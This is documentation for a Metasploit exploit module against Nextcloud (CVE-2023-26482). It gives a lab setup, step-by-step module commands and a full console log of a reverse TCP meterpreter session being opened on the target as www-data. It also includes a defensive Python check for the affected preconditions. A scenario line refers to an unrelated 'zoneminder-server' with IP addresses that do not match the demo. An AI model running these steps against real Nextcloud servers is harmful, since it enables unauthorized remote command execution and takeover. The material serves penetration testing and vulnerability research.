metasploit-gs/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
2025-05-14 13:40:47 +00:00

Description

This module exploits a command injection that leads to remote code execution in Nextcloud installations if the app Workflow External Scripts is also installed. The vulnerability affects Nextcloud versions >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0.

A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability leads to authenticated remote command execution.

More details on the vulnerability: CVE-2023-26482.

The module automatically uses the cmd/linux/http/x64/meterpreter/reverse_tcp payload.

The module checks whether the target is vulnerable by adding and then removing a dummy workflow.
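The two preconditions named above (an affected version line and the Workflow External Scripts app being enabled) can be inventoried from the defender's side. The following check is an added example, not code from the Metasploit module; it assumes Nextcloud's /status.php and the OCS provisioning endpoint /ocs/v1.php/cloud/apps (admin credentials required), and that the app id is workflow_script. The patched release for each version line is not given on this page, so a match only means "compare against the vendor advisory".

```python
"""Added inventory check (not part of the Metasploit module): does a Nextcloud
instance match the two preconditions the module documentation names?"""
import json
import urllib.request
from base64 import b64encode

# Major version lines this page lists as affected. Fixed patch levels are not
# on the page, so a hit means "check the vendor advisory for your line".
AFFECTED_MAJORS = {18, 19, 20, 21, 22, 23, 24, 25}
WORKFLOW_SCRIPT_APP = "workflow_script"  # assumed app id of "Workflow external scripts"


def parse_status(status_json: str) -> dict:
    """Parse a /status.php body into version string, major line and affected flag."""
    data = json.loads(status_json)
    version = data.get("versionstring") or data["version"]
    major = int(version.split(".")[0])
    return {"version": version, "major": major, "affected_line": major in AFFECTED_MAJORS}


def parse_enabled_apps(ocs_json: str) -> set:
    """Parse an OCS /cloud/apps?filter=enabled&format=json body into app ids."""
    return set(json.loads(ocs_json)["ocs"]["data"]["apps"])


def assess(status_json: str, ocs_json: str) -> dict:
    """Combine both responses; only version line AND app together match the module."""
    result = parse_status(status_json)
    result["workflow_script_enabled"] = WORKFLOW_SCRIPT_APP in parse_enabled_apps(ocs_json)
    result["matches_module_preconditions"] = (
        result["affected_line"] and result["workflow_script_enabled"]
    )
    return result


def fetch(base_url: str, admin_user: str, admin_pass: str) -> dict:
    """Live variant against a real instance (assumed endpoints, admin auth needed)."""
    base = base_url.rstrip("/")
    status = urllib.request.urlopen(base + "/status.php", timeout=10).read().decode()
    req = urllib.request.Request(base + "/ocs/v1.php/cloud/apps?filter=enabled&format=json")
    req.add_header("Authorization", "Basic " + b64encode(f"{admin_user}:{admin_pass}".encode()).decode())
    req.add_header("OCS-APIRequest", "true")
    apps = urllib.request.urlopen(req, timeout=10).read().decode()
    return assess(status, apps)


# Constructed sample responses, shaped like the 24.0.5 lab instance on this page.
SAMPLE_STATUS = '{"installed":true,"maintenance":false,"needsDbUpgrade":false,"version":"24.0.5.1","versionstring":"24.0.5","edition":"","productname":"Nextcloud","extendedSupport":false}'
SAMPLE_APPS = '{"ocs":{"meta":{"status":"ok","statuscode":100,"message":"OK"},"data":{"apps":["files","workflowengine","workflow_script"]}}}'

if __name__ == "__main__":
    print(assess(SAMPLE_STATUS, SAMPLE_APPS))
```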

Vulnerable Application

Nextcloud is a suite of client-server software for creating and using file hosting services.

This module has been tested successfully on Nextcloud versions:

  • Nextcloud version 24.0.5

Source and Installers

Docker Installation

This exploit was tested against a Nextcloud Docker container started with docker-compose and the following docker-compose.yml:

volumes:
  nextcloud:
  db:

services:
  db:
    image: mariadb:10.6
    restart: always
    command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW
    volumes:
      - db:/var/lib/mysql
    environment:
      - MARIADB_ROOT_PASSWORD=root
      - MARIADB_PASSWORD=root
      - MARIADB_DATABASE=nextcloud
      - MARIADB_USER=nextcloud

  app:
    image: nextcloud:24.0.5
    restart: always
    ports:
      - 8080:80
    links:
      - db
    environment:
      - MYSQL_PASSWORD=root
      - MYSQL_DATABASE=nextcloud
      - MYSQL_USER=root
      - MYSQL_HOST=db
      - NEXTCLOUD_ADMIN_PASSWORD=admin
      - NEXTCLOUD_ADMIN_USER=admin
      - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080"
    depends_on:
      - db

NOTE: Change the IP address and port in NEXTCLOUD_TRUSTED_DOMAINS to match your setup.

After docker compose up -d, log in as admin, install the workflow app "Workflow external script", and create a low-privileged user alice. Make sure that "Cron (Recommended)" is selected under Settings > "Background Jobs". Before running the exploit, start the cron job; this is crucial, because otherwise the payload never gets triggered:

docker exec -it -u www-data nextcloud-app-1 /bin/bash
watch -n2 php cron.php

Wait until the watch command outputs something like: "Every 2.0s: php cron.php".

Verification Steps

Example steps in this format (also listed in the PR):

  1. Do: use exploit/unix/webapp/nextcloud_workflows_rce
  2. Do: set RHOSTS [ips]
  3. Do: set LHOST [lhost]
  4. Do: set RPORT 8080
  5. Do: set USERNAME alice
  6. Do: set PASSWORD alice-password
  7. Do: run
  8. You should get a shell after a while

Options

TARGETURI

Remote web path to the Nextcloud installation (default: /)

USERNAME

The low-privileged username to authenticate to Nextcloud

PASSWORD

The password for the low-privileged user

Scenarios

In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the Metasploit host is 192.42.1.188.

Nextcloud 24.0.5 (docker-compose)

The following demo shows how to use the exploit:

msf6 > use exploit/unix/webapp/nextcloud_workflows_rce
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64
RHOSTS => 192.168.233.64
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117
LHOST => 192.168.233.117
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice
USERNAME => alice
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa
PASSWORD => CaeD4ohchaiv5ieDooBa
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run
[*] Started reverse TCP handler on 192.168.233.117:4444
[*] Sending payload..
[+] Workflow created
[*] Waiting for the payload to connect back ..
[*] Sending stage (3045380 bytes) to 192.168.233.64
[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000
[+] Payload connected!
[*] Cleaning up

meterpreter > getuid
Server username: www-data

Limitations

Ensure that the WfsDelay advanced option is set to a value that allows cron to execute the payload. The default is 16 minutes.